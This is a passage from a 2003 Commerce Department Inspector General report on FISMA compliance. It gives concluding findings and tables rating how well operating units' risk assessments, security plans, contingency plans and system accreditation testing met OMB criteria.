2003\n\n\n\n\nXVI. Conclusion\n\nOur FY 2003 FISMA review found that senior management continues to give attention and\npriority to information security. With the support of the Deputy Secretary, the Department\xe2\x80\x99s CIO\nhas worked hard to improve information security throughout Commerce. In January 2003, the\nCIO finalized a new information security policy that comprehensively defines Commerce\xe2\x80\x99s\nprogram for protecting agency information systems, and its detailed requirements are helping\nimprove the security programs of the operating units. Responsibilities are clearly delineated for\nCommerce\xe2\x80\x99s senior agency officials and CIOs, system life-cycle information security\nrequirements are specified, and security is becoming better integrated into the capital planning\nand investment control process.\n\nThis noteworthy progress is moderated by the considerable challenges that persist, the greatest of\nwhich is ensuring adequate security on the hundreds of Commerce systems. Much remains to be\ndone in this regard, especially in assessing risk and determining appropriate security controls,\ntesting and evaluating these controls, certifying and accrediting systems, and ensuring that\npersonnel with specialized information security responsibilities receive the necessary training. As\nwe have pointed out previously, implementing an effective information security program\nthroughout Commerce requires both education and substantial cultural change. Until program\nand IT officials throughout the Department better understand what is expected of them, and all\npersonnel with specialized information security roles acquire and maintain the requisite\nknowledge and skills, the security of many Commerce systems remain problematic.\n\nUSPTO\n\nUSPTO\xe2\x80\x99s information security program continues to progress. This agency is working to ensure\nthat its senior program officials understand and accept their responsibilities for information\nsecurity, a prerequisite for an effective and long-lived program. Security has become better\nintegrated into the capital planning and investment control process for IT, and system life-cycle\ninformation security requirements and processes are being improved. Significantly, USPTO is\nwell on its way to having its systems certified and accredited. And because it is using a rigorous\napproach and comprehensive testing, it has gained a great deal of insight into system-specific\nweaknesses that must be corrected and organization-wide security policies, procedures, and\nprocesses that must be improved. USPTO must continue to focus on actions to correct the\nidentified system weaknesses; improve policies, procedures and processes; and ensure compliance\non a continuing basis.\n\n\n\n\n                                                33\n\n\x0cU.S. Department of Commerce                                           Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                              September 2003\n\n\n\n\n                Appendix A. Evaluation of Certification and Accreditation Materials\n\nIn answer to OMB Question C.1, this appendix presents the results of our evaluation of the extent\nto which operating unit program officials and CIOs have\xef\xa3\xa7for the systems for which they are\nresponsible\xef\xa3\xa7(1) assessed risks, (2) determined appropriate security levels, (3) maintained\nsecurity plans, and (4) tested and evaluated security controls. We reviewed the following\ninformation for 37 systems in 6 operating units, including 5 NOAA line offices:25\n\n\xe2\x80\xa2\t     Risk assessment\n\xe2\x80\xa2\t     Security plan\n\xe2\x80\xa2\t     Contingency plan\n\xe2\x80\xa2\t     Security test and evaluation materials (test procedures and results)\n\xe2\x80\xa2\t     Any additional certification and accreditation materials\n\xe2\x80\xa2\t     Any reports that document an independent security assessment of the system (e.g., a\n       contractor assessment)\n\nIn reviewing this information, we focused on whether the following had been accomplished:\n\nSystems have been certified and accredited with adequate testing. Testing security controls is\nessential for validating that the required controls are in place and working as intended, and is a\nkey part of system certification.\n\nResidual risks have been identified for certified and accredited systems. Residual risks are\nthe risks remaining after appropriate security controls have been incorporated in a system. In\naccrediting a system, the DAA is explicitly accepting the residual risks; therefore, these risks\nmust be clearly identified.\n\nRisk assessments provide a sufficient basis for identifying security controls. To determine\nsystem security controls that appropriately balance the cost of protective measures against\noperational and economic costs, risks must be identified and their impacts assessed.\n\nSecurity plans adequately describe applications, data, data flow, and system\ninterconnections, and support the assigned sensitivity levels. This is fundamental information\nfor planning system security. Sensitivity levels are determined to be low, medium, or high based\non requirements for confidentiality, integrity, and availability of the information handled, and are\nneeded to design appropriate security controls.\n\nContingency plans identify alternate processing sites, and describe system backup and\nrestoration procedures. This is basic information to enable the recovery of systems, operations,\nand data after a disruption.\n\nWe were able to determine whether a system\xe2\x80\x99s risk assessment, security plan, or contingency plan\ngenerally provided the appropriate information, but without a thorough assessment of the system\n\n25\n     Our evaluation of USPTO is presented separately in Finding XI.\n\n\n\n                                                       A-1 \n\n\x0cU.S. Department of Commerce                                               Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                  September 2003\n\n\n\nitself, we could not determine whether the information was complete or wholly accurate. In many\ncases, however, information was clearly missing, inconsistent with other information presented,\nor not responsive to the intent of the document. Although some operating units sent us draft\nmaterials, we evaluated final documentation only.\n\nWe present our findings for the operating units we reviewed in the tables below, showing for\neach the number of evaluated systems that met the corresponding OMB criterion. Where\nadditional information is useful, we include brief comment.\n\nTable A-1: Bureau of Economic Analysis\n\n                Criteria                  OIG Evaluation\n\n                                          3\n Number of systems reviewed\n Number of systems certified and\n                                          2\n accredited\n Number of systems certified and\n                                          0\n accredited with adequate testing\n Number of systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n provide a sufficient basis for           1\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   1\n --Identify interconnections              3\n --Provide support for assigned               One plan had assigned medium confidentiality to publicly\n                                          2\n  sensitivity levels                          available information.\n                                              One plan covered all 3 systems (the local area network and 2\n Number of contingency plans that\n                                              applications), and contained detailed procedures and evidence of\n adequately:\n                                              recent testing.\n --Identify alternate sites               3\n --Describe backup procedures             3\n --Describe system restoration\n                                          3\n  procedures\n\n\n\n\n                                                 A-2 \n\n\x0cU.S. Department of Commerce                                               Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                  September 2003\n\n\n\n\n\nTable A-2: Bureau of Industry and Security\n\n                Criteria                  OIG Evaluation\n\n                                          3\n Number of systems reviewed\n                                              Two systems have interim accreditations that expire in late\n Number of systems certified and\n                                          0   September 2003. For 1 system, no documentation was provided\n accredited\n                                              to support the 12/31/02 accreditation.\n Number of systems certified and\n                                          0   Automated vulnerability scan results were provided for 1 system.\n accredited with adequate testing\n Number of systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n provide a sufficient basis for           1\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   1\n --Identify interconnections              2\n --Provide support for assigned\n                                          1\n  sensitivity levels\n Number of contingency plans that\n adequately:\n --Identify alternate sites               0\n --Describe backup procedures             1\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-3 \n\n\x0cU.S. Department of Commerce                                                 Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                    September 2003\n\n\n\n\n\nTable A-3: Census Bureau\n\n                 Criteria                  OIG Evaluation\n\n                                           4*\n Number of systems reviewed\n Number of systems certified and\n                                            4\n accredited\n Number of systems certified and\n                                            0\n accredited with adequate testing\n Number of systems certified and\n accredited with residual risks             0\n identified\n Number of risk assessments that\n provide a sufficient basis for             1\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow     2\n --Identify interconnections                4\n --Provide support for assigned\n                                            3\n  sensitivity levels\n Number of contingency plans that\n adequately:\n --Identify alternate sites                 3\n --Describe backup procedures               3\n --Describe system restoration\n                                            2\n  procedures\n\n*We reviewed general support systems for the National Processing Center and Geography division. The Geography\nsystem has four components, three of which had final documentation. Documentation for the fourth is being\ndeveloped. We assessed the three that have final documentation, treating them as separate systems for purposes of\nthis review. Census plans to accredit the fourth component and the Geography system as a whole in early\nFY 2004.\n\n\n\n\n                                                    A-4 \n\n\x0cU.S. Department of Commerce                                               Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                  September 2003\n\n\n\n\n\nTable A-4: National Institute of Standards and Technology\n\n                Criteria                  OIG Evaluation\n\n                                          5\n Number of systems reviewed\n                                              IT security officer is reviewing all certified and accredited\n Number of systems certified and              systems and making recommendations for improvement.\n                                          5\n accredited                                   Vulnerability scans are being required as a condition of staying\n                                              on the network.\n Number of systems certified and\n                                          0\n accredited with adequate testing\n Number of systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n provide a sufficient basis for           2\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   1\n --Identify interconnections              2\n --Provide support for assigned               Two systems did not address sensitivity, and the remaining 3 did\n                                          0\n  sensitivity levels                          not justify the sensitivity levels assigned.\n Number of contingency plans that\n                                              Two systems had no contingency plan.\n adequately:\n --Identify alternate sites               1\n --Describe backup procedures             3\n --Describe system restoration\n                                          2\n  procedures\n\n\n\n\n                                                 A-5 \n\n\x0cU.S. Department of Commerce                                                Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                   September 2003\n\n\n\n\n\nTable A-5: National Technical Information Service\n\n                Criteria                  OIG Evaluation\n\n                                          3\n Number of systems reviewed\n Number of systems certified and              All 3 systems have expired interim accreditations. NTIS plans to\n                                          0\n accredited                                   reaccredit these systems by end of the fiscal year.\n Number of systems certified and              Interim accreditation letters state that testing was performed, but\n                                          0\n accredited with adequate testing             no evidence was provided.\n Number of systems certified and              Interim accreditation letters state that residual risks were\n accredited with residual risks           0   considered, but none were identified. Vulnerability scans were\n identified                                   conducted after interim accreditation was granted.\n Number of risk assessments that\n provide a sufficient basis for           0   No risk assessments were provided.\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   0\n --Identify interconnections              0\n --Provide support for assigned\n                                          0\n  sensitivity levels\n Number of contingency plans that\n adequately:\n --Identify alternate sites               0\n --Describe backup procedures             3\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-6 \n\n\x0cU.S. Department of Commerce                                              Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                 September 2003\n\n\n\n\n\nTable A-6: NOAA-National Environmental Satellite, Data, and Information Service\n\n                Criteria                  OIG Evaluation\n                                              Two of the systems were evaluated as part of our FY 03 in-depth\n                                          3\n Number of systems reviewed                   FISMA reviews.\n Number of systems certified and\n                                          3\n accredited\n Number of systems certified and\n                                          0\n accredited with adequate testing\n Number systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n                                              Risk assessments were hazard matrices, which do not provide a\n provide a sufficient basis for           0\n                                              sufficient basis for determining controls.\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   0\n --Identify interconnections              0\n --Provide support for assigned\n                                          1\n  sensitivity levels\n Number of contingency plans that\n adequately:\n --Identify alternate sites               1\n --Describe backup procedures             3\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-7 \n\n\x0cU.S. Department of Commerce                                              Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                 September 2003\n\n\n\n\n\nTable A-7: NOAA-National Marine Fisheries Service\n\n                Criteria                  OIG Evaluation\n                                              Both systems were evaluated as part of our FY 03 in-depth\n                                          2\n Number of systems reviewed                   FISMA reviews.\n Number of systems certified and\n                                          2\n accredited\n Number of systems certified and\n                                          0\n accredited with adequate testing\n Number systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n                                              Risk assessments did not use NOAA\xe2\x80\x99s standard hazard matrices\n provide a sufficient basis for           2\n                                              and were more complete.\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   0\n --Identify interconnections              0\n --Provide support for assigned\n                                          0\n  sensitivity levels\n Number of contingency plans that\n adequately:\n --Identify alternate sites               1\n --Describe backup procedures             2\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-8 \n\n\x0cU.S. Department of Commerce                                                Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                   September 2003\n\n\n\n\n\nTable A-8: NOAA-National Ocean Service\n\n                  Criteria                OIG Evaluation\n\n Number of systems reviewed               3\n Number of systems certified and\n                                          3\n accredited\n Number of systems certified and              Vulnerability scans performed on 2 systems; password strength\n                                          0\n accredited with adequate testing             tested on 1 system.\n Number systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n provide a sufficient basis for               Risk assessments were hazard matrices, which do not provide a\n                                          0\n identifying security controls                sufficient basis for determining controls.\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   1\n                                              The list of interconnections in one plan may not be complete,\n --Identify interconnections              3   because some that are cited elsewhere in the plan are not on the\n                                              list.\n --Provide support for assigned               Confidentiality not well supported in 2 plans, and both had\n                                          1\n  sensitivity levels                          conflicting confidentiality levels.\n Number of contingency plans that\n adequately:\n                                              Contingency plans address the need to establish alternate sites,\n --Identify alternate sites               0\n                                              but do not identify the sites.\n --Describe backup procedures             3\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-9 \n\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\n\n\nTable A-9: NOAA-National Weather Service\n\n                 Criteria                    OIG Evaluation\n\n                                              7\n Number of systems reviewed\n Number of systems certified and\n                                              7\n accredited\n Number of systems certified and\n                                              0\n accredited with adequate testing\n Number systems certified and\n accredited with residual risks               0\n identified\n Number of risk assessments that\n                                                   Risk assessments were hazard matrices, which do not provide a\n provide a sufficient basis for               0\n                                                   sufficient basis for determining controls.\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow       1\n --Identify interconnections                  1\n                                                   One system\xe2\x80\x99s confidentiality level was based on an inaccurate\n --Provide support for assigned\n                                              0    description of the data, while the remaining systems did not\n  sensitivity levels\n                                                   support assigned sensitivity levels.\n Number of contingency plans that\n adequately:\n --Identify alternate sites                  7*\n --Describe backup procedures                3\n --Describe system restoration\n                                              0\n  procedures\n\n*Three systems are covered in contingency plans for site certifications and accreditations.\n\n\n\n\n                                                      A-10 \n\n\x0cU.S. Department of Commerce                                               Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                  September 2003\n\n\n\n\n\nTable A-10: NOAA-Office of Atmospheric Research\n\n                Criteria                  OIG Evaluation\n\n                                          4\n Number of systems reviewed\n Number of systems certified and\n                                          4\n accredited\n                                              OAR stated that these systems do not require testing beyond\n Number of systems certified and\n                                          0   NIST self-assessment; however, based on their sensitivity, we\n accredited with adequate testing\n                                              believe thorough testing is required.\n Number of systems certified and\n accredited with residual risks           0\n identified\n Number of risk assessments that\n                                              OAR augmented NOAA\xe2\x80\x99s standard hazard matrices with more\n provide a sufficient basis for           4\n                                              complete risk assessments.\n identifying security controls\n Number of security plans that\n adequately:\n --Describe applications/data/data flow   0\n --Identify interconnections              1\n                                              One system indicated that it carries Privacy Act, financial, and\n                                              credit card information; however, the system is a meteorological\n --Provide support for assigned\n                                          1   system used to obtain scientific atmospheric information. This\n  sensitivity levels\n                                              inaccuracy appears to have resulted from sections being cut and\n                                              pasted from another plan without sufficient revision.\n                                              One plan (for a different system than that cited above) had\n Number of contingency plans that\n                                              sections cut and pasted from another plan without sufficient\n adequately:\n                                              revision (e.g., the wrong system is cited in places).\n --Identify alternate sites               1\n --Describe backup procedures             4\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-11 \n\n\x0cU.S. Department of Commerce                                      Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                         September 2003\n\n\n\n\n\n                      Appendix B. OIG Evaluations Used In This Report\n\n1. \t   National Oceanic and Atmospheric Administration, Stronger Security Controls Needed to\n       Protect NMFS Information Technology Systems, Inspection Report No. OSE-15693,\n       September 2003.\n\n2. \t   National Oceanic and Atmospheric Administration, Stronger Security Controls Needed to\n       Protect NESDIS\xe2\x80\x99 Headquarters Local Area Network, Inspection Report No. OSE-15996\n       3-0001, September 2003.\n\n3. \t   National Oceanic and Atmospheric Administration, Stronger Security Controls Needed to\n       Protect NESDIS Research Data System, Inspection Report No. OSE-15996-3-0002,\n       September 2003.\n\n4. \t   Office of the Secretary, Review of IT Controls to Support the FY 2002 Consolidated\n       Financial Statement Audit, Audit Report No. FSD-15214-3-0001, January 2003.\n\n5. \t   National Technical Information Service, Improvements Needed in the General Controls\n       Associated with NTIS\xe2\x80\x99s Financial Management Systems, Audit Report No. FSD-15212,\n       December 2002.\n\n6. \t   United States Patent and Trademark Office, Improvements Needed in the General\n       Controls Associated with USPTO\xe2\x80\x99s Financial Management Systems, Audit Report No.\n       FSD-15213, December 2002.\n\n\n\n\n                                            B-1 \n\n\x0c"